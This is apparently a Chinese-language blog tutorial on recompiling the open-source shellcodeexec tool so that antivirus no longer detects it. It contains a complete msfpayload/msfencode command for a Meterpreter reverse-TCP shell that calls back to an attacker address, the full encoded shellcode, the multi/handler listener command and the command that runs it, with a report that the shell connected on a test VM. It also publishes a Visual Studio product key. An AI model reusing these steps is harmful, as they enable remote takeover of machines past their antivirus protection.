shellcodeexec 重新编译免杀

之前的一篇文章介绍利用shellcodeexec.exe执行metasploit的shellcode。不过现实中却出现杀软直接干掉了shellcodeexec.exe,所以,此方法也不实用了,不过好在shellcodeexec是开源的,咱们可以自己编译。
首先我的编译环境安装了visual studio 2010。
这里附上中文旗舰版的下载地址,以及序列号:

http://download.microsoft.com/download/E/0/4/E0427BB8-8490-4C7F-A05B-AFEA0FC3EA80/X16-60997VS2010UltimTrialCHS.iso YCFHQ-9DWCY-DKV88-T2TMH-G7BHP

然后还有安装Microsoft Platform SDK for Windows Server 2003 R2

安装完之后,添加一个环节变量:

Sample value:
--------------------------------------------------------------------------
变量名称			变量值
--------------------------------------------------------------------------
PLATFORM_SDK_DIR		C:\Program Files\Microsoft Platform SDK for Windows Server 2003 R2

直接点击shellcodeexec.sln,会提示工程转换,因为作者的开发环境是visual studio 2005.
转换完毕,按F7会编译程序。完成之后用瑞星扫描一下提示无病毒~事实上,很多开源的hack tools都可以换个编译器编译绕过杀软~当然,有的需要修改下源代码~

然后在kali上生成shellcode,本机测试下:

msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=80 LHOST=192.168.1.7 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

[*] x86/alpha_mixed succeeded with size 634 (iteration=1)

PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLHhK9S0wp5PqpMYKUua9BqtLK2rTpnkSbflLKV2r4LKd2ExVooGCzwVfQyovQO0nLel3QCL4BTlgPYQZoTMFaO7irhpv2CgnkBrvpnkPBGLFan0lKaPd8LEo0bT1ZuQzp0PNkPHdXnkqHUpUQyCHcElqYNkWDNkVa8Vp1Ioea9PNLYQXODMUQ9WWHyp0u8tC3qmzXuk3MUtD59rPXLKChGT31jsu6lKtLRkNkpXglWqXSlKUTlK6ahPLIqTTd5tskaKCQV9qJ2qiokPF8aOsjNk22hkOvCmph7Cp2c07prHbWSCdraO0TqxpLbWfF379oJuNXJ0EQS0s0eyKt2tf0u8FIOp2KS09okeBp0PV0v0Spf0spBpU8kZtOYOM0yoyEmGbJ7uPhiPMxS1EWbHc2ePUPrpk9XfaztP0VSg3XnyY5qdPaYozuk5o0SDflyo0N380uHlE8l0x5oRrvyoHURJePrJFdRvV7BHgr8YIXqOIoXUNkdvqzG0bHEPTPGpUP661zGpCXpX94f3zEIoXUNsccazuPsfaCrwu8vbkiiXsoYoIEuQZcq98FOuZVD5JLySAA

监听:

msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=80 LHOST=192.168.1.7 E

本机执行:

x:\vs2010l\Projects\shellcodeexec-win\Release\shellcodeexec.exe PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLHhK9S0wp5PqpMYKUua9BqtLK2rTpnkSbflLKV2r4LKd2ExVooGCzwVfQyovQO0nLel3QCL4BTlgPYQZoTMFaO7irhpv2CgnkBrvpnkPBGLFan0lKaPd8LEo0bT1ZuQzp0PNkPHdXnkqHUpUQyCHcElqYNkWDNkVa8Vp1Ioea9PNLYQXODMUQ9WWHyp0u8tC3qmzXuk3MUtD59rPXLKChGT31jsu6lKtLRkNkpXglWqXSlKUTlK6ahPLIqTTd5tskaKCQV9qJ2qiokPF8aOsjNk22hkOvCmph7Cp2c07prHbWSCdraO0TqxpLbWfF379oJuNXJ0EQS0s0eyKt2tf0u8FIOp2KS09okeBp0PV0v0Spf0spBpU8kZtOYOM0yoyEmGbJ7uPhiPMxS1EWbHc2ePUPrpk9XfaztP0VSg3XnyY5qdPaYozuk5o0SDflyo0N380uHlE8l0x5oRrvyoHURJePrJFdRvV7BHgr8YIXqOIoXUNkdvqzG0bHEPTPGpUP661zGpCXpX94f3zEIoXUNsccazuPsfaCrwu8vbkiiXsoYoIEuQZcq98FOuZVD5JLySAA

shellcodeexec

拷贝shellcodeexec.exe到32位的windows 2003 R2虚拟机上执行,提示缺少msvcr100.dll。
于是将msvcr100.dll封装为静态链接。。
步骤:在vc++ 2010里按 ALT+F7----配置属性----C/C++----代码生成----运行库,设为多线程(/MT)

重新编译,发现程序体积达到40K+,放到虚拟机,执行,上线……

当传送payload的时候,貌似会触发某些杀软的主动防御……

上一篇
下一篇